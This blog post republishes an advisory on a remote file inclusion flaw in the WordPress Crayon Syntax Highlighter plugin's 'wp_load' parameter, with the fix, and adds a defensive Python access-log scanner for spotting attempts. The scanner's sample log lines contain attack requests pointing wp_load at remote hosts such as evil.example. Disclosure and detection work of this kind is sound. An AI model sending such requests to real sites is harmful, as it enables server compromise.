WordPress Crayon Syntax Highlighter Plugin “wp_load” Remote File Inclusion Vulnerability

Charlie Eriksen has discovered a vulnerability in the Crayon Syntax Highlighter plugin for WordPress, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the “wp_load” parameter in wp-content/plugins/crayon-syntax-highlighter/util/ajax.php and wp-content/plugins/crayon-syntax-highlighter/util/preview.php is not properly verified before being used to include files. This can be exploited to include arbitrary PHP files from external FTP resources.

The vulnerability is confirmed in Crayon Syntax Highlighter plugin version 1.12.1. Prior versions may also be affected.
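Because the advisory only names the affected endpoints and the parameter, a site owner's first question after updating is usually whether anyone already tried this. The script below is an added example, not code from the advisory, from Secunia or from the plugin: it walks web-server access-log lines in the common/combined format, picks out requests to the two Crayon endpoints, and flags any whose wp_load query parameter carries a remote URL scheme (ftp://, http:// and friends), which is the shape an RFI attempt takes. The plugin directory slug crayon-syntax-highlighter, the log format and the sample log lines (RFC 5737 documentation addresses, made-up hostnames) are all assumptions of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Plugin endpoints named in the advisory (directory slug assumed to be the
# plugin's standard "crayon-syntax-highlighter").
VULN_PATHS = (
    "/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php",
    "/wp-content/plugins/crayon-syntax-highlighter/util/preview.php",
)

# URL schemes that allow_url_include could turn into a remote include; the
# advisory names FTP, the others are the usual companions.
REMOTE_SCHEMES = {"ftp", "ftps", "http", "https"}

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_request(target: str):
    """Return a reason string if `target` (path?query from a request line)
    looks like an RFI attempt against the Crayon endpoints, otherwise None."""
    parts = urlsplit(target)
    if parts.path.lower() not in VULN_PATHS:
        return None
    # parse_qs decodes one layer of percent-encoding; unquote again so a
    # double-encoded scheme ("ftp%253A%252F%252F...") is still recognised.
    for value in parse_qs(parts.query, keep_blank_values=True).get("wp_load", []):
        try:
            scheme = urlsplit(unquote(value)).scheme.lower()
        except ValueError:
            # urlsplit rejects some malformed netlocs; a value that cannot
            # even be parsed is not a legitimate local path either.
            return "wp_load value is malformed (could not parse)"
        if scheme in REMOTE_SCHEMES:
            return f"wp_load points to remote {scheme}:// resource"
    return None


def scan_log(lines):
    """Run classify_request over raw access-log lines; return a list of hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        reason = classify_request(m.group("target"))
        if reason:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "status": m.group("status"),
                         "target": m.group("target"), "reason": reason})
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, made-up hostnames).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Oct/2012:10:00:00 +0000] "GET /wp-content/plugins/crayon-syntax-highlighter/util/preview.php?wp_load=ftp%3A%2F%2Fevil.example%2Fremote.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Oct/2012:10:00:01 +0000] "GET /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=http://198.51.100.9/remote.txt HTTP/1.1" 500 0',
    '192.0.2.3 - - [15/Oct/2012:10:00:02 +0000] "GET /index.php?wp_load=ftp://evil.example/remote.txt HTTP/1.1" 200 1024',
    '192.0.2.4 - - [15/Oct/2012:10:00:03 +0000] "GET /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?action=crayon HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["status"]} {hit["reason"]}: {hit["target"]}')
```

Two caveats when using this on real logs: a wp_load value sent in a POST body never reaches the access log, so an absence of hits is not proof of absence, and a remote include only succeeds when PHP's allow_url_include (for ftp:// also allow_url_fopen) is enabled, so the status code of a flagged request hints at whether the attempt actually loaded anything. Updating to 1.13 removes the hole; this only tells you whether someone knocked on it before you did.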

wp_load Remote File Inclusion Vulnerability solution

Update to version 1.13.

Provided and/or discovered by

Charlie Eriksen via Secunia

Original Advisory

Charlie:
http://ceriksen.com/2012/10/15/wordpress-crayon-syntax-highlighter-remote-file-inclusion-vulnerability/ (fixed link, which is broken in the Secunia advisory)

Secunia Advisory

http://secunia.com/advisories/50804/

About the Author Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, websites & optimization.
